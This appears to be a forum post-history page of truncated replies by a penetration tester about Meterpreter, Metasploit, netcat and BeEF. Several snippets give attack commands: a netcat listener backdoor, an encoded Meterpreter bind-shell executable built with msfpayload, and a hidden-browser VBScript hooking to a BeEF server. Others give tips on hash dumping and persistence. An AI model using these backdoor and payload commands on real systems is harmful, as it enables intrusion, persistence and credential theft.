Type: Posts; User: BadKarmaPR; Keyword(s):
Thanks for the kind words, I'm glad you liked my script. I will be posting later today my slide deck from my part of the presentation with HD and JR on Meterpreter, where I covered Meterpreter Scripting I...
Did you need to reboot for the UAC disable to take effect, or did it work without the reboot?
Vista has protections as well as Windows 2008; you have to be SYSTEM to be able to dump the hashes. You can do this by either using an exploit that gives you SYSTEM or using schtasks to schedule a...
Meterpreter is a great payload for launching attacks, but it does have its limitations, like:
Single Thread
Does not currently have a sys proxy capability - so no Nmap scanning through the pivot...
Sorry, it has been a long time since I logged in to the forum.
http://www.darkoperator.com/tools-and-scripts/
Try this
http://darkoperator.blogspot.com/2009/04/dns-recon-tool-written-in-ruby.html
Hey bro
No problem with that. Metasploit is more for a full book if you want to cover it, and it is always changing. I had the same idea about showing only the hash extraction; if you need any help...
Yes, the code should be updated. Now in MSF3, if you want to know what DB driver is active you issue the db_driver command; if you want to change to another supported driver, do db_driver and its name...
Great work, and the thing I love the most is in the Hydra section: you covered using a single thread and not 30 or 40 like I have seen in other tutorials. I have seen routers being DoSed by inexperience...
Could you please post the steps that you used? My understanding was that in Meterpreter the route command was for the pivoting of exploits that had the support to be channeled through the Meterpreter...
niceeeeeeee!!! Never seen this one before; it is along the lines of using the InGuardians tool and sc but in fewer steps.
Netcat is a true backdoor; it has to be the most flexible tool there is. I would suggest Cryptcat for pentests, but then again, rarely in a pentest do the ROE let us place a backdoor, because we add risk to...
netsh is a Windows command to configure network settings, not a Linux command. I would recommend that you first get a Netcat backdoor working since it is the simplest: nc -L -d -p <backdoor port of...
It will port-forward any remote port to a local port through the Meterpreter channel, useful for when wanting to connect to the target's RDP or Telnet.
Good example:...
To make a BeEF backdoor, first do the following: we create a VBScript that will launch a hidden iexplore pointed to our BeEF server:
echo CreateObject("Wscript.Shell").Run "iexplore.exe -new...
Some notes:
For backdoors, use bind shells, since they will open the port and just listen.
You have to open the port in the local firewall if it is enabled.
If your target is behind a firewall...
If UAC is enabled this is going to be a hard one to make; you can place it in the Programs Startup folder. schtasks should let you schedule as the user, the same as AT.
Thanks. Sadly, the portfwd command in Meterpreter in version 3.2 is broken; you might try to get a copy of 3.0 and test on it, and also on 3.1 with a reverse shell, since it fails on the bind shell since...
Why not use Metasploit itself? Create a payload with msfpayload, something like this:
/msfpayload windows/meterpreter/bind_tcp LPORT=8080 R | ./msfencode -c 2 -t exe -o 345532.exe
Then...
Use the PassiveX payload; it will set the payload as an ActiveX on IE and use its configured proxy to make the connection back to the attacking host. Natron is working on improving it to work better...
The only way to achieve what you want is to upload scanline and use it to scan from the compromised host.
Meterpreter currently does not have that capability.
Bro, it is to all of us!! I think hard and long before I send a Meterpreter script for commitment into MSF3 and release some of my tools, since I know the use that some kid or who knows who is going...
Chaemelion, Wine can emulate only a subset of the Win32 API and not all other Windows components; due to the complexity and requirements, it cannot be run on Wine. I may suggest you install VirtualBox...
As you can see in the quote, I did mention Process Explorer :p
I'm more of a command shell guy myself. PsTools also has tools for looking at the DLLs loaded and can be scripted to run against...
You know that some of these tools are for uploading to a target host, like nc.exe, pulist, fgdump ... among others, but nice work either way on the ones that need to be in the menu.